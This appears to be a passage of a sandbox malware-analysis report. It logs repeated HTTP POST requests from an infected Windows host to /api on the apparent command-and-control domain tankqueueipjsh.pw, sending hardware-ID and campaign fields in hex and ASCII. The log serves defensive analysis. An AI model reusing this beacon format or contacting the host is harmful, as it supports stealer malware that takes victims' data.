                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VC5oMUWIVB72xXeEtc6B2LASmTVhwx715sEmBvixuAUYXsrJQzQ1l3A67E3ugYZXw5h1BD%2FB2Ee9CT8i%2BszvviiEOe8VXUwXHDvYJt9143m7jNjDY%2BuW2K0zXBFEx2sY98oH3w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: clou
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:12.589060068 CET120INData Raw: 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 34 65 39 32 35 39 62 65 63 33 38 38 30 2d 49 41 44 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: flareCF-RAY: 8314e9259bec3880-IAD15Malformed packet data
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:12.589073896 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                        22192.168.2.550208104.21.83.14580
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:12.694678068 CET335OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 500
                                                                                                                                                                                                                                                                        Host: tankqueueipjsh.pw
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:12.695347071 CET554OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 66 38 64 61 37 33 32 64 30 30 30
                                                                                                                                                                                                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2f8da732d0000f9170d343b08f146u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Me
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:13.060388088 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:35:13 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=k1ivfqf67h93q7bhi98vpt9tj0; expires=Sun, 31 Mar 2024 07:21:51 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:12 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:12 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:12 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YlhsM69O1x%2BKatmtmDGREzDgWnhOeQU29oIWiOzLuGTpb7FiJ39P1JbgOqtFcEPs1rCYGbu%2BwwfBcDSto2LkT23Nzsd6yVohH4EWwxYpMaswb9ueFHo%2FLFl9dR4ZrMqQOOIZdA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: clou
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:13.060440063 CET120INData Raw: 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 34 65 39 32 38 39 66 64 61 33 62 31 38 2d 49 41 44 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: flareCF-RAY: 8314e9289fda3b18-IAD15Malformed packet data
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:13.060476065 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                        23192.168.2.550209104.21.83.14580
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:13.376007080 CET335OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 500
                                                                                                                                                                                                                                                                        Host: tankqueueipjsh.pw
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:13.376260042 CET554OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 66 38 64 61 37 33 32 64 30 30 30
                                                                                                                                                                                                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2f8da732d0000f9170d343b08f146u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Me
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:13.725276947 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:35:13 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=rjot0f7vh1q57qs72dcu01hedr; expires=Sun, 31 Mar 2024 07:21:52 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:13 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:13 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:13 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BmGzz7iko4ot%2FYA0Uc4XIlOaRDMP%2F33wWzUjVBWdh7zPHUHZaQD1RZluOzDEkcc5eTPnZDTSjRJqXa6rMuiwP0LsOEh%2Fw8zQUi9l67EYsCEEhSV1XeqSLTvX7pI8TT3iaxQ9bQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: clou
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:13.725356102 CET120INData Raw: 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 34 65 39 32 63 64 38 35 38 36 39 66 66 2d 49 41 44 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: flareCF-RAY: 8314e92cd85869ff-IAD15Malformed packet data
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:13.725388050 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                        24192.168.2.550210104.21.83.14580
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:13.826215982 CET335OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 500
                                                                                                                                                                                                                                                                        Host: tankqueueipjsh.pw
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:13.826765060 CET554OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 66 38 64 61 37 33 32 64 30 30 30
                                                                                                                                                                                                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2f8da732d0000f9170d343b08f146u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Me
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:14.441092968 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:35:14 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=lbjmr492l3hur98hdlm1br9n1q; expires=Sun, 31 Mar 2024 07:21:53 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:14 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:14 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:14 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5PX1oTOmeo%2BjQ5pWuHx01Y3jUjil0q1Wruuu6ikBSg4i9n%2BxlJpNLoYaNjQ9tGhOXoIx7empsgliROrHZ1TdmjoYzMmWVUTXQOGQIrHB3Q03Q7OIIoaz2vmTWk%2FTioILSu0dEA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: clou
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:14.441132069 CET120INData Raw: 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 34 65 39 32 66 61 61 34 30 39 63 37 30 2d 49 41 44 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: flareCF-RAY: 8314e92faa409c70-IAD15Malformed packet data
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:14.441215992 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        25192.168.2.550211104.21.83.145802972C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:14.547991991 CET335OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 500
                                                                                                                                                                                                                                                                        Host: tankqueueipjsh.pw
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:14.548238993 CET554OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 66 38 64 61 37 33 32 64 30 30 30
                                                                                                                                                                                                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2f8da732d0000f9170d343b08f146u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Me
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:14.825082064 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:35:14 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=2gnraq3oqt1e6bcm79delpu01q; expires=Sun, 31 Mar 2024 07:21:53 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:14 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:14 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:14 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uzSagh88XxEbHiC%2FFbfVy4%2BQ8IFTtbeXW9ZON1Xfo6jTZ8kp3ExUgf1sW7JCslAge1NLGtyNa%2FvFxGWtMn1cDPTww%2Brlasm3WPP4NiLFuWGRHNYzYIrRma7l6Aq2y9GVOByqVg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cl
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:14.825109959 CET122INData Raw: 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 34 65 39 33 34 32 65 37 66 32 30 35 38 2d 49 41 44 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: udflareCF-RAY: 8314e9342e7f2058-IAD15Malformed packet data
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:14.825126886 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                        26192.168.2.550212104.21.83.14580
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:14.932410955 CET335OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 500
                                                                                                                                                                                                                                                                        Host: tankqueueipjsh.pw
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:14.932665110 CET554OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 66 38 64 61 37 33 32 64 30 30 30
                                                                                                                                                                                                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2f8da732d0000f9170d343b08f146u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Me
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:15.295813084 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:35:15 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=er8lset6inuu898tglj0oq5n0q; expires=Sun, 31 Mar 2024 07:21:54 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:15 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:15 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:15 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qL8thlMhIbtpRMZm9h2O4HkXQgqUoIFZ9AwFnQwJ5cMkT1aZ6aJOgvBTbYk%2FgFt0bsDGn%2BpkPNC0TFaOPOJfeQPfnYQKx18hhn%2BdhL8GGIqzljPuXRJwVEF7GkDzllz%2FKrGx5g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cl
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:15.295835018 CET122INData Raw: 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 34 65 39 33 36 39 61 37 33 33 39 32 65 2d 49 41 44 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: udflareCF-RAY: 8314e9369a73392e-IAD15Malformed packet data
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:15.295850992 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                        27192.168.2.550213104.21.83.14580
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:15.402070999 CET335OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 500
                                                                                                                                                                                                                                                                        Host: tankqueueipjsh.pw
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:15.402343988 CET554OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 66 38 64 61 37 33 32 64 30 30 30
                                                                                                                                                                                                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2f8da732d0000f9170d343b08f146u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Me
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:15.767662048 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:35:15 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=0st8lpmgrekrr4h6oiltj7aghq; expires=Sun, 31 Mar 2024 07:21:54 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:15 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:15 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:15 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=aSBKMnKgKknXVz06gviCMDm73sI6m%2Fj3HBdtz%2Bx7eX1LsdzozK4o6K7lAGOnc3ZF5rt7R1L015CCHzb86Zd9eefsrKk2Vjsc0QHJZT3ld90IyzI8R7d6UZZAACbbi2EcVGD09A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudf
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:15.767693043 CET118INData Raw: 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 34 65 39 33 39 38 38 65 31 32 30 37 38 2d 49 41 44 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: areCF-RAY: 8314e93988e12078-IAD15Malformed packet data
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:15.767709017 CET59INData Raw: 30 0d 0a 0d 0a
